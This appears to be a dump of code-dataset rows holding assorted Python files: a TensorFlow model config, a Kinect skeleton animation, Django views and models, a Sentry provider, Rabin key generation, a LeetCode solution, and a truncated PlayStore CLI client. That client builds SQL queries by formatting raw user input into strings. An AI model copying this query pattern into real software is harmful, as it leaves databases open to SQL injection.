# actually fires (decay_rate is 1.0 anyway, so the rate stays constant).
NUM_BATCHES_PER_EPOCH = 1e8
# Observation stream consumed by the uncertainty model.
STATE_DESC = 'depths1'

# Full configuration for train.train_local: model topology, per-submodel
# optimizers, learning-rate schedules, and data-provider parameters.
params = {
    'model_params' : {
        'cfg' : {
            'world_model' : mario_world_model_config,
            'uncertainty_model' : {
                # Two stacked 64x64 RGB frames.
                'state_shape' : [2, 64, 64, 3],
                'action_dim' : 8,
                'n_action_samples' : 50,
                # Five-layer convolutional encoder for the state.
                'encode' : {
                    'encode_depth' : 5,
                    'encode' : {
                        1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                        2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
                        3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                        4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
                        5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
                    }
                },
                # Two-layer MLP head emitting a single scalar output.
                'mlp' : {
                    'hidden_depth' : 2,
                    'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                                2 : {'num_features' : 1, 'activation' : 'identity'}
                    }
                },
                'state_descriptor' : STATE_DESC
            },
            'seed' : 0
        },
    },
    # Gradient-clipped Adam for every sub-model.
    'optimizer_params' : {
        'world_model' : {
            'fut_model' : {
                'func': optimizer.ClipOptimizer,
                'optimizer_class': tf.train.AdamOptimizer,
                'clip': True,
            },
            'act_model' : {
                'func': optimizer.ClipOptimizer,
                'optimizer_class': tf.train.AdamOptimizer,
                'clip': True,
            }
        },
        'uncertainty_model' : {
            'func': optimizer.ClipOptimizer,
            'optimizer_class': tf.train.AdamOptimizer,
            'clip': True,
        }
    },
    'learning_rate_params' : {
        'world_model' : {
            'act_model' : {
                'func': tf.train.exponential_decay,
                'learning_rate': 1e-5,
                'decay_rate': 1.,
                'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
                'staircase': True
            },
            'fut_model' : {
                'func': tf.train.exponential_decay,
                'learning_rate': 1e-5,
                'decay_rate': 1.,
                'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
                'staircase': True
            }
        },
        'uncertainty_model' : {
            'func': tf.train.exponential_decay,
            'learning_rate': 1e-5,
            'decay_rate': 1.,
            'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
            'staircase': True
        }
    },
    'data_params' : {
        # Per-dimension action magnitudes: 1, 1, then 80 for six dimensions.
        'action_limits' : np.array([1., 1.] + [80. for _ in range(6)]),
        'full_info_action' : True
    },
    'visualize' : True,
    'exp_id' : 'test_latent'
}

if __name__ == '__main__':
    train.train_local(**params)
| '''
Local test for latent space model training.
'''
import sys
sys.path.append('curiosity')
sys.path.append('tfutils')
import tensorflow as tf
from curiosity.interaction import train
from curiosity.interaction.models import mario_world_model_config
from tfutils import base, optimizer
import numpy as np
NUM_BATCHES_PER_EPOCH = 1e8
STATE_DESC = 'depths1'
params = {
'model_params' : {
'cfg' : {
'world_model' : mario_world_model_config,
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
},
'state_descriptor' : STATE_DESC
},
'seed' : 0
},
},
'optimizer_params' : {
'world_model' : {
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
},
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': tf.train.AdamOptimizer,
'clip': True,
}
},
'learning_rate_params' : {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': 1e-5,
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'data_params' : {
'action_limits' : np.array([1., 1.] + [80. for _ in range(6)]),
'full_info_action' : True
},
'visualize' : True,
'exp_id' : 'test_latent'
}
if __name__ == '__main__':
train.train_local(**params) | en | 0.673614 | Local test for latent space model training. # exponential decay each epoch # exponential decay each epoch # exponential decay each epoch | 2.221317 | 2 |
Data_Conversion/animation.py | simay1224/K-project-UI | 0 | 6617374 | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 02 13:04:16 2016
@author: liuqi
"""
# Kinect v2 skeleton joint indices (Kinect SDK JointType enumeration order).
JointType_SpineBase = 0
JointType_SpineMid = 1
JointType_Neck = 2
JointType_Head = 3
JointType_ShoulderLeft = 4
JointType_ElbowLeft = 5
JointType_WristLeft = 6
JointType_HandLeft = 7
JointType_ShoulderRight = 8
JointType_ElbowRight = 9
JointType_WristRight = 10
JointType_HandRight = 11
JointType_HipLeft = 12
JointType_KneeLeft = 13
JointType_AnkleLeft = 14
JointType_FootLeft = 15
JointType_HipRight = 16
JointType_KneeRight = 17
JointType_AnkleRight = 18
JointType_FootRight = 19
JointType_SpineShoulder = 20
JointType_HandTipLeft = 21
JointType_ThumbLeft = 22
JointType_HandTipRight = 23
JointType_ThumbRight = 24
import cPickle as pk
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
############################
# Motion capture / Kinect skeleton playback: animates two joint scatters,
# one from motion-capture data and one from Kinect data, frame by frame.
#
# NOTE(review): this is Python 2 code (``file()``, ``xrange``, cPickle);
# it will not run unmodified under Python 3.
###########################
src_path_M = 'E:/Kinect_gaussian_5to7/Unified_M_data/ex6/'
src_path_K = 'E:/Kinect_gaussian_5to7/Unified_K_data/ex6/'
m_data_path = 'Qingyuan_2017-03-06 01.43.26 PM_ex6_FPS30_motion_unified'+'.pkl'
k_data_path = 'Qingyuan_data20170306134320_unified_ex6'+'.pkl'
# Pickled mappings: joint index -> per-axis per-frame coordinate arrays
# (structure inferred from the indexing below -- confirm against the writer).
data_all = pk.load(file(src_path_M+m_data_path))
kdata_all = pk.load(file(src_path_K+k_data_path))
NUM_LABELS = len(data_all) # total number of the joints
NUM_FRAMES = len(data_all[0][1]) # total number of the frames
kNUM_FRAMES = len(kdata_all[0][1])

# 3D scene setup. NOTE(review): the axis labels are remapped relative to the
# data axes (the plot's first axis is labelled "Z axis"); the update loop
# below plots (x, z) planar coordinates with y on the third axis -- confirm
# the intended orientation.
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.set_xlim(-500,300)
ax.set_ylim(-1000,400)
ax.set_zlim(50,600)
ax.set_xlabel('Z axis')
ax.set_ylabel('X axis')
ax.set_zlabel('Y axis')

# Seed both scatters with one placeholder point per joint at the origin.
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
    xs.append(0)
    ys.append(0)
    zs.append(0)
    kxs.append(0)
    kys.append(0)
    kzs.append(0)
l_M, = ax.plot(xs,ys,zs, marker='o', linestyle='None', color='r',label='MoCam Joints')
l_K, = ax.plot(kxs,kys,kzs, marker='o', linestyle='None', color='b',label='Kinect Joints')
ax.legend( loc=1)
plt.draw()

# Animate frame by frame up to the shorter of the two recordings.
for frame_no in xrange(min(kNUM_FRAMES,NUM_FRAMES)):
    xs = []
    ys = []
    zs = []
    kxs = []
    kys = []
    kzs = []
    for joint_idx in data_all.keys() :
        xs.append(data_all[joint_idx][0][frame_no])
        ys.append(data_all[joint_idx][1][frame_no])
        zs.append(data_all[joint_idx][2][frame_no])
        # Kinect skeleton shifted by -500 so the two bodies don't overlap.
        kxs.append(kdata_all[joint_idx][0][frame_no]-500)
        kys.append(kdata_all[joint_idx][1][frame_no])
        kzs.append(kdata_all[joint_idx][2][frame_no])
    # Update the existing artists in place rather than re-plotting.
    l_M.set_data(xs,zs)
    l_M.set_3d_properties(ys)
    l_K.set_data(kxs,kzs)
    l_K.set_3d_properties(kys)
plt.pause(0.0001) | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 02 13:04:16 2016
@author: liuqi
"""
JointType_SpineBase = 0
JointType_SpineMid = 1
JointType_Neck = 2
JointType_Head = 3
JointType_ShoulderLeft = 4
JointType_ElbowLeft = 5
JointType_WristLeft = 6
JointType_HandLeft = 7
JointType_ShoulderRight = 8
JointType_ElbowRight = 9
JointType_WristRight = 10
JointType_HandRight = 11
JointType_HipLeft = 12
JointType_KneeLeft = 13
JointType_AnkleLeft = 14
JointType_FootLeft = 15
JointType_HipRight = 16
JointType_KneeRight = 17
JointType_AnkleRight = 18
JointType_FootRight = 19
JointType_SpineShoulder = 20
JointType_HandTipLeft = 21
JointType_ThumbLeft = 22
JointType_HandTipRight = 23
JointType_ThumbRight = 24
import cPickle as pk
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
############################
# Motion capture
###########################
src_path_M = 'E:/Kinect_gaussian_5to7/Unified_M_data/ex6/'
src_path_K = 'E:/Kinect_gaussian_5to7/Unified_K_data/ex6/'
m_data_path = 'Qingyuan_2017-03-06 01.43.26 PM_ex6_FPS30_motion_unified'+'.pkl'
k_data_path = 'Qingyuan_data20170306134320_unified_ex6'+'.pkl'
data_all = pk.load(file(src_path_M+m_data_path))
kdata_all = pk.load(file(src_path_K+k_data_path))
NUM_LABELS = len(data_all) # total number of the joints
NUM_FRAMES = len(data_all[0][1]) # total number of the frames
kNUM_FRAMES = len(kdata_all[0][1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.set_xlim(-500,300)
ax.set_ylim(-1000,400)
ax.set_zlim(50,600)
ax.set_xlabel('Z axis')
ax.set_ylabel('X axis')
ax.set_zlabel('Y axis')
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
xs.append(0)
ys.append(0)
zs.append(0)
kxs.append(0)
kys.append(0)
kzs.append(0)
l_M, = ax.plot(xs,ys,zs, marker='o', linestyle='None', color='r',label='MoCam Joints')
l_K, = ax.plot(kxs,kys,kzs, marker='o', linestyle='None', color='b',label='Kinect Joints')
ax.legend( loc=1)
plt.draw()
for frame_no in xrange(min(kNUM_FRAMES,NUM_FRAMES)):
xs = []
ys = []
zs = []
kxs = []
kys = []
kzs = []
for joint_idx in data_all.keys() :
xs.append(data_all[joint_idx][0][frame_no])
ys.append(data_all[joint_idx][1][frame_no])
zs.append(data_all[joint_idx][2][frame_no])
kxs.append(kdata_all[joint_idx][0][frame_no]-500)
kys.append(kdata_all[joint_idx][1][frame_no])
kzs.append(kdata_all[joint_idx][2][frame_no])
l_M.set_data(xs,zs)
l_M.set_3d_properties(ys)
l_K.set_data(kxs,kzs)
l_K.set_3d_properties(kys)
plt.pause(0.0001) | en | 0.369231 | # -*- coding: utf-8 -*- Created on Fri Dec 02 13:04:16 2016 @author: liuqi ############################ # Motion capture ########################### # total number of the joints # total number of the frames | 1.46261 | 1 |
app/api/views.py | nikhiljohn10/django-api-template | 0 | 6617375 | from rest_framework import viewsets
from api.serializers import ManufacturerSerializer, CarSerializer, OwnershipSerializer, OwnerSerializer
from api.models import Manufacturer, Car, Ownership, Owner
class ManufacturerViewSet(viewsets.ModelViewSet):
    """Full CRUD REST endpoints for Manufacturer records."""

    queryset = Manufacturer.objects.all()
    serializer_class = ManufacturerSerializer
class CarViewSet(viewsets.ModelViewSet):
    """Full CRUD REST endpoints for Car records."""

    queryset = Car.objects.all()
    serializer_class = CarSerializer
class OwnershipViewSet(viewsets.ModelViewSet):
    """Full CRUD REST endpoints for Ownership records."""

    queryset = Ownership.objects.all()
    serializer_class = OwnershipSerializer
class OwnerViewSet(viewsets.ModelViewSet):
    """Full CRUD REST endpoints for Owner records."""

    queryset = Owner.objects.all()
    serializer_class = OwnerSerializer
| from rest_framework import viewsets
from api.serializers import ManufacturerSerializer, CarSerializer, OwnershipSerializer, OwnerSerializer
from api.models import Manufacturer, Car, Ownership, Owner
class ManufacturerViewSet(viewsets.ModelViewSet):
queryset = Manufacturer.objects.all()
serializer_class = ManufacturerSerializer
class CarViewSet(viewsets.ModelViewSet):
queryset = Car.objects.all()
serializer_class = CarSerializer
class OwnershipViewSet(viewsets.ModelViewSet):
queryset = Ownership.objects.all()
serializer_class = OwnershipSerializer
class OwnerViewSet(viewsets.ModelViewSet):
queryset = Owner.objects.all()
serializer_class = OwnerSerializer
| none | 1 | 2.144288 | 2 | |
src/sentry/identity/bitbucket/provider.py | AlexWayfer/sentry | 4 | 6617376 | <filename>src/sentry/identity/bitbucket/provider.py
from __future__ import absolute_import
from sentry.pipeline import PipelineView
from sentry.utils.http import absolute_uri
from sentry.identity.base import Provider
class BitbucketIdentityProvider(Provider):
    """Sentry identity provider for Bitbucket."""

    key = 'bitbucket'
    name = 'Bitbucket'

    def get_pipeline_views(self):
        """Single-step identity pipeline: the Bitbucket add-on login view."""
        return [BitbucketLoginView()]
class BitbucketLoginView(PipelineView):
    """Pipeline step that routes the user through Bitbucket's add-on flow."""

    def dispatch(self, request, pipeline):
        # A ``jwt`` query parameter signals the add-on authorization has
        # completed (presumably supplied by Bitbucket's redirect -- confirm);
        # until it is present, send the user to the authorize page with our
        # descriptor URL.
        jwt = request.GET.get('jwt')
        if jwt is None:
            return self.redirect(
                'https://bitbucket.org/site/addons/authorize?descriptor_uri=%s' % (
                    absolute_uri('/extensions/bitbucket/descriptor/'),
                ))
        return pipeline.next_step()
| <filename>src/sentry/identity/bitbucket/provider.py
from __future__ import absolute_import
from sentry.pipeline import PipelineView
from sentry.utils.http import absolute_uri
from sentry.identity.base import Provider
class BitbucketIdentityProvider(Provider):
key = 'bitbucket'
name = 'Bitbucket'
def get_pipeline_views(self):
return [BitbucketLoginView()]
class BitbucketLoginView(PipelineView):
def dispatch(self, request, pipeline):
jwt = request.GET.get('jwt')
if jwt is None:
return self.redirect(
'https://bitbucket.org/site/addons/authorize?descriptor_uri=%s' % (
absolute_uri('/extensions/bitbucket/descriptor/'),
))
return pipeline.next_step()
| none | 1 | 2.099218 | 2 | |
rabin/prime.py | LukasForst/rabin-crypto | 0 | 6617377 | from typing import Tuple
import Crypto.Util.number as number
from rabin.crypto_configuration import PRIME_LENGTH_BITS
from rabin.dto import RabinCryptoKey, RabinSecretKey, RabinPublicKey
def euklids_algorithm(a: int, b: int) -> Tuple[int, int, int]:
    """
    Extended Euclidean algorithm: returns (gcd, x, y) with GCD = x*a + y*b.
    >>> a, b = 3, 13
    >>> gcd, ax, by = euklids_algorithm(a, b)
    >>> gcd == ax*a + by*b
    True
    """
    if a == 0:
        # Base case: gcd(0, b) = b = 0*a + 1*b.
        return b, 0, 1
    # Recurse on (b mod a, a) and lift the Bezout coefficients one level up.
    gcd, x_prev, y_prev = euklids_algorithm(b % a, a)
    return gcd, y_prev - (b // a) * x_prev, x_prev
def generate_rabin_key(bit_len: int = PRIME_LENGTH_BITS) -> RabinCryptoKey:
    """
    Securely generate whole key material for Rabin cryptosystem.

    Both primes are Blum primes (p = 3 mod 4), which simplifies computing
    square roots during decryption.
    """
    # NOTE(review): p and q are drawn independently and a p == q collision is
    # not explicitly excluded (astronomically unlikely at this bit length).
    p, q = _get_private_key_prime(bit_len), _get_private_key_prime(bit_len)
    return RabinCryptoKey(
        private=RabinSecretKey(p=p, q=q),
        public=RabinPublicKey(n=p * q)
    )
def _get_private_key_prime(bit_len: int) -> int:
    """Draw random primes until one congruent to 3 mod 4 is found.

    ``Crypto.Util.number.getPrime`` is backed by ``urandom`` internally and
    is therefore suitable for cryptographic key generation.
    """
    candidate = number.getPrime(bit_len)
    while candidate % 4 != 3:
        candidate = number.getPrime(bit_len)
    return candidate
| from typing import Tuple
import Crypto.Util.number as number
from rabin.crypto_configuration import PRIME_LENGTH_BITS
from rabin.dto import RabinCryptoKey, RabinSecretKey, RabinPublicKey
def euklids_algorithm(a: int, b: int) -> Tuple[int, int, int]:
"""
Euklids algorithm returning GCD = X*a + Y*b.
>>> a, b = 3, 13
>>> gcd, ax, by = euklids_algorithm(a, b)
>>> gcd == ax*a + by*b
True
"""
if a == 0:
return b, 0, 1
gcd, x1, y1 = euklids_algorithm(b % a, a)
x = y1 - (b // a) * x1
y = x1
return gcd, x, y
def generate_rabin_key(bit_len: int = PRIME_LENGTH_BITS) -> RabinCryptoKey:
"""
Securely generate whole key material for Rabin cryptosystem.
"""
p, q = _get_private_key_prime(bit_len), _get_private_key_prime(bit_len)
return RabinCryptoKey(
private=RabinSecretKey(p=p, q=q),
public=RabinPublicKey(n=p * q)
)
def _get_private_key_prime(bit_len: int) -> int:
while True:
# cryptographically secure way how to generate prime number
# internally it uses urandom, which is suitable for cryptographic use
p = number.getPrime(bit_len)
if p % 4 == 3:
return p
| en | 0.736576 | Euklids algorithm returning GCD = X*a + Y*b. >>> a, b = 3, 13 >>> gcd, ax, by = euklids_algorithm(a, b) >>> gcd == ax*a + by*b True Securely generate whole key material for Rabin cryptosystem. # cryptographically secure way how to generate prime number # internally it uses urandom, which is suitable for cryptographic use | 3.466294 | 3 |
leetcode/python/easy/p788_rotatedDigits.py | kefirzhang/algorithms | 0 | 6617378 | class Solution:
def rotatedDigits(self, N: int) -> int:
# 1-》 2 5 6 9 0 -》 0 1 8 -1 3 4 7
helper = [0, 0, 1, -1, -1, 1, 1, -1, 0, 1]
total = 0
for i in range(1, N + 1):
i = str(i)
if len(i) <= 1:
if helper[int(i)] == 1:
total += 1
print(i)
else:
left = int(i[:-1])
right = int(i[-1])
if helper[left] == -1 or helper[right] == -1:
helper.append(-1)
elif helper[left] == 0 and helper[right] == 0:
helper.append(0)
else:
helper.append(1)
total += 1
# print(i)
return total
# Manual smoke test: print the count of good numbers in [1, 100].
slu = Solution()
print(slu.rotatedDigits(100))
| class Solution:
def rotatedDigits(self, N: int) -> int:
# 1-》 2 5 6 9 0 -》 0 1 8 -1 3 4 7
helper = [0, 0, 1, -1, -1, 1, 1, -1, 0, 1]
total = 0
for i in range(1, N + 1):
i = str(i)
if len(i) <= 1:
if helper[int(i)] == 1:
total += 1
print(i)
else:
left = int(i[:-1])
right = int(i[-1])
if helper[left] == -1 or helper[right] == -1:
helper.append(-1)
elif helper[left] == 0 and helper[right] == 0:
helper.append(0)
else:
helper.append(1)
total += 1
# print(i)
return total
slu = Solution()
print(slu.rotatedDigits(100))
| zh | 0.653068 | # 1-》 2 5 6 9 0 -》 0 1 8 -1 3 4 7 # print(i) | 3.155795 | 3 |
domain/arrive_info.py | kex5n/Vehicles-Dispatch-Simulator | 0 | 6617379 | <filename>domain/arrive_info.py
from enum import Enum
# random.seed(1234)
# np.random.seed(1234)
# torch.manual_seed(1234)
# torch.cuda.manual_seed_all(1234)
# torch.backends.cudnn.deterministic = True
class ArriveInfo(Enum):
    """Outcome of an arrival/dispatch attempt in the simulator."""

    REJECT = "Reject"
    SUCCESS = "Success"
| <filename>domain/arrive_info.py
from enum import Enum
# random.seed(1234)
# np.random.seed(1234)
# torch.manual_seed(1234)
# torch.cuda.manual_seed_all(1234)
# torch.backends.cudnn.deterministic = True
class ArriveInfo(Enum):
REJECT = "Reject"
SUCCESS = "Success"
| en | 0.180819 | # random.seed(1234) # np.random.seed(1234) # torch.manual_seed(1234) # torch.cuda.manual_seed_all(1234) # torch.backends.cudnn.deterministic = True | 2.022767 | 2 |
04_Django/Django_db/Relation_db/models.py | DajuanM/DHPythonDemo | 0 | 6617380 | <gh_stars>0
from django.db import models
# Create your models here.
class School(models.Model):
    """A school; the one-to-one relation lives on Manager.my_school."""

    # NOTE(review): school_id is a plain IntegerField -- neither the primary
    # key nor unique; confirm whether duplicates are acceptable.
    school_id = models.IntegerField()
    school_name = models.CharField(max_length=20)
    #manager = models.OneToOneField(Manager)

    def __str__(self):
        return self.school_name
class Manager(models.Model):
manager_id = models.IntegerField()
manager_name = models.CharField(max_length=20)
my_school = models.OneToOneField(School)
def __str__(self):
return self.manager_name | from django.db import models
# Create your models here.
class School(models.Model):
school_id = models.IntegerField()
school_name = models.CharField(max_length=20)
#manager = models.OneToOneField(Manager)
def __str__(self):
return self.school_name
class Manager(models.Model):
manager_id = models.IntegerField()
manager_name = models.CharField(max_length=20)
my_school = models.OneToOneField(School)
def __str__(self):
return self.manager_name | en | 0.872256 | # Create your models here. #manager = models.OneToOneField(Manager) | 2.668559 | 3 |
ronpy/__init__.py | rhsmits91/ronpy | 0 | 6617381 | from . import decorators
from . import logger
# Package version string; bump on release.
__version__ = '0.0.1'


def get_version():
    """Return the package version string."""
    return __version__
| from . import decorators
from . import logger
__version__ = '0.0.1'
def get_version():
return __version__
| none | 1 | 1.734751 | 2 | |
user.py | Niraj-Kamdar/PlayStore-Database | 0 | 6617382 | from __future__ import print_function, unicode_literals
import itertools
import sys
from clint.textui import colored, indent, puts
from pyfiglet import figlet_format as figlet
from PyInquirer import Separator, Token, prompt, style_from_dict
from playstore import PlayStore
def convert(val, ans):
if "int" in val:
return int(ans)
elif "numeric" in val:
return float(ans)
elif "bool" == val:
return True if ans == "true" else False
else:
return ans
db = PlayStore()
puts(colored.green(figlet("PlayStore")))
style = style_from_dict(
{
Token.Separator: "#<PASSWORD>",
Token.QuestionMark: "#<PASSWORD>",
Token.Selected: "#<PASSWORD>", # default
Token.Pointer: "#<PASSWORD> bold",
Token.Instruction: "#<PASSWORD>", # default
Token.Answer: "#<PASSWORD> bold",
Token.Question: "#<PASSWORD>",
}
)
q1 = [
{
"type": "input",
"message": "Enter your userid (email)",
"name": "userid",
"validate": lambda text: len(text) != 0 or "Enter a valid userid",
},
{
"type": "list",
"message": "Select option",
"name": "product",
"choices": [{"name": "App"}, {"name": "Book"}, {"name": "Account"}],
"validate": lambda answer: "You must choose a product."
if len(answer) == 0
else True,
},
]
a1 = prompt(q1, style=style)
if a1["product"] == "App":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [{"name": "Install"}, {"name": "Update"}, {"name": "Uninstall"}, {"name": "Wishlist"}],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "previously installed apps"},
{"name": "wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to install",
"name": "install",
"choices": [],
}
]
q5 = [
{
"type": "checkbox",
"message": "Select category from which you want to install app",
"name": "category",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": [1, 2, 3, 4, 5],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
dcommand = {"Uninstall": False, "Update": True, "Feedback": True}
a2 = prompt(q2, style=style)
if a2["option"] == "Install":
a3 = prompt(q3, style=style)
if a3["option"] == "previously installed apps":
apps = db.downloaded_app(a1["userid"], False, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in previously installed apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in wishlisted apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i])
if not s:
puts(
colored.red(
"{} is a paid app, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], apps[i], pays.get(a7["payment"]))
if s:
puts(colored.green("{} downloaded successfully.".format(i)))
else:
puts(colored.red("download of {} failed. may be because your card has been expired".format(i)))
else:
puts(colored.green("{} downloaded successfully.".format(i)))
elif a2["option"] in dcommand:
apps = db.downloaded_app(a1["userid"], True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
q4[0]["message"] = "Select app you want to {}".format(a2["option"])
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a2["option"] == "Feedback":
for i in a4["install"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
db.feedback(a1["userid"], apps[i], a8["rating"], a8["comment"])
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i], install=dcommand[a2["option"]])
puts(colored.green("{} {}ed successfully.".format(i, a2["option"])))
elif a2["option"] == "Wishlist":
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "remove wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to add to/(remove from) wishlist ",
"name": "install",
"choices": [],
}
]
a3 = prompt(q3, style=style)
if a3["option"] == "remove wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
if apps == []:
puts(colored.red("Your wishlist is empty!"))
sys.exit()
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a3["option"] == "remove wishlisted apps":
for i in a4["install"]:
db.remove_wishlist(a1["userid"], apps[i])
puts(colored.green("{} removed from wishlist successfully.".format(i)))
else:
for i in a4["install"]:
s = db.wishlist(a1["userid"], apps[i])
if not s:
puts(colored.red("App can't be added to wishlist because app is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
elif a1["product"] == "Book":
q2 = [
{
"type": "list",
"message": "Select category from which you want to show/purchase book.",
"name": "option",
"choices": [
{"name": "wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "my library"},
{"name": "search books"},
{"name": "wishlist books"},
],
